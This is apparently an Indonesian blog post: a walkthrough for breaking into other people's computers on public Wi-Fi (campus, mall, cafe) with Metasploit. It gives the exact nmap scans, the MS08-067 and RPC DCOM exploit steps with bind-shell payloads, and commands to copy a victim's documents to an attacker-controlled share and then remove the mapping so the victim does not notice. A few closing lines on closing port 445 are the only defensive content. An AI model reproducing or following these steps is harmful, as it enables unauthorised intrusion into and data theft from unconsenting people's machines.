oke, langsung aja dah sob, ane tak mau lama lama.. nih, postingan ane mau ngsih tau cara hacking mengunakan metasploit framework. soft ini berfungsi mengambil alih kepemilikan akses komputer orang lain melalui kompi kita. udah pada punya belom. kalo belum langsung kesini atau disini..
terus gimana cara gunainnya..??
tenang, langsung di baca aja dah.
LINUX
setelah download metasploit for linux (link ane kasih di atas sob)Install dengan perintah
$su
# ./namafile.run
pilih yes
tidak perlu diupdate
Ok silahkan jalan-jalan di area hotspot di kampus, mall atau cafe/restoran
jangan lupa duduk yang manis dan tenang sambil minum juice (kopi kurang baik)
Cari target komputer yang sedang aktif online
terlebih dulu cari tau nomor IP DHCP yang kita dapat.
$ sudo ifconfig -a
lihat hasilnya :
eth1 Link encap:Ethernet HWaddr 00:50:BF:1B:B5:51
inet addr:192.168.0.10 Bcast:192.168.0.255 Mask:255.255.255
itu menunjukkan kita mendapat IP 192.168.0.10
langsung scan komputer yang lagi online di area tersebut
$ nmap -sP 192.168.0.0/24
lihat hasilnya :
Host 192.168.0.1 appears to be up.
MAC Address: 00:B0:6C:EF:47:30 (Unknown)
Host arman (192.168.0.10) appears to be up.
Host 192.168.0.1 appears to be up.
MAC Address: 00:E0:4C:ED:41:20 (Unknown)
Host mycomp (192.168.0.11) appears to be up.
MAC Address: 00:E0:5C:FD:45:17 (Unknown)
dan seterusnya……………
OK pilih salah satu target (korban) yaitu : 192.168.0.11
Lakukan ping dulu ke IP korban. sapa tau sudah dipasang firewall
$ ping 192.168.0.11
Jika hasilnya reply maka siap melakukan langkah berikutnya
Scan port yang terbuka terlebih dahulu
$ nmap 192.168.0.11
lihat hasilnya:
PORT STATE SERVICE
139/tcp open nb-session
445/tcp open microsoft-ds
8080/tcp open http-proxy
OK port 445 terbuka dan sasaran empuk untuk menyusup kesana
lakukan urutan exploitasi berikut:
Jalankan metasploit
$ msfconsole
Pilih jenis tools untuk exploit
msf> use windows/smb/ms08_067_netapi
Pilih metode penyerangan
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
Tambahkan target IP korban
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.11
Langsung lakukan exploit
msf exploit(ms08_067_netapi) > exploit
jika muncul prompt dibawah ini brarti serangan berhasil
meterpreter>
Eiits tunggu dulu ini belum menguasai komputer korban sepenuhnya
Tinggal satu perintah lagi, setelah itu baru bisa diapa-apain.
meterpreter> execute -M -f cmd.exe -i
lihat hasilnya :
C:\Windows\System32>
nah kita sudah masuk sepenuhnya… mau diapain nih?
jangan dirusak lah kasihan.. kita copy saja datanya ke komputer kita
barangkali ada surat rahasia atau data korupsi hehehe..
OK persiapan untuk copy data
Pastikan Linux kita sudah ada samba dan service sudah started
Sharinglah sebuah folder di linux kita dengan permission read and write
jangan lupa juga : $ sudo chmod 777 nama-folder
disini saya kasih contoh nama folder saya “didit”
OK Kembali ke komputer korban (target)
cari dulu data yang dianggap penting..
biasanya ditaruh di D:\ atau di My Documents
misalnya data yang kita incar ada di D:\ maka lakukan perintah berikut :
C:\Windows\System32>D:
D:\>dir
05/25/2010 10:57 PM 22.700 rahasia.doc
Nah tuh ada file bernama “rahasia.doc”
selanjutnya kita buat mapping drive ke komputer kita
D:\>net use Z: \\192.168.0.10\didit
OK tinggal copy file “rahasia.doc” ke drive Z: yang sebenarnya adalah komputer kita
D:\>copy rahasia.doc Z:
segera tutup drive Z: agar ga ketahuan oleh korban
D:\>net use /delete Z:
OK aman
Silahkan buka file “rahasia.doc” di folder “didit” menggunakan openoffice
Gampang kan..
Nah seperti etika hacking yang ada pada umumnya
kita bukan hanya memberi cara menerobos tapi juga cara mengamankannya
Yang pertama pakailah Linux hehehe
Jika terpaksa pakai windows maka:
download worm cleaner di http://www.softpedia.com/progDownload/Windows-Worms-Doors-Cleaner-Download-107294.html
lalu buka file tersebut maka otomatis akan menutup port 445
jika ingin membuka lagi port tersebut cukup klik tombol enabled
Jangan lupa aktifkan firewall anda. (original post by http://saifulanas.wordpress.com)
Windows
buat pake meta di win, kita donlot metas yg buat win. nah selanjutnya instal dan buka porgrmnya sampe keluar gambar kaya ginibis itu, isi kotak search dengna dcom terus pilih Exploits Microsoft RPC DCOM Interface Overflow.
terus pilih target yang mau kita ambil
Kemudian kita dihadapkan pada pilihan payload. Payload adalah sebuah aksi yang dilakukan setelah bug berhasil di exploitasi oleh Metasploit. Untuk pembelajaran, kita pilih Generic/Shell_Bind_TCP , artinya kita akan mengambil alih Shell Bind atau lebih dikenal di lingkungan windows dengan Command Prompt dari target hacking kita. Setelah itu klik Forward.
langkah berikutnya kita tentukan Ip target sob, nah disini kita cuma perlu mengganti IP di RHOST k0lom saja karna Rport dan lport udah di tentuin sama DCOM service nya. dan kemudian forward
jika semua proses berhasil kita bakal dapet pesan kaya gini..
nah, selanjutanya kalo target berhasil terexploitasi, daftar ip target bala muncul di kanan bawah. pada kolom sesion.
nah terakhi ni.. kita bakal dapet comand promt window, kalo yang ini terserah aja dah sama adminnya mau di apain itu kompi, ane ga tanggung.. hhee..
oke fren, selesai dah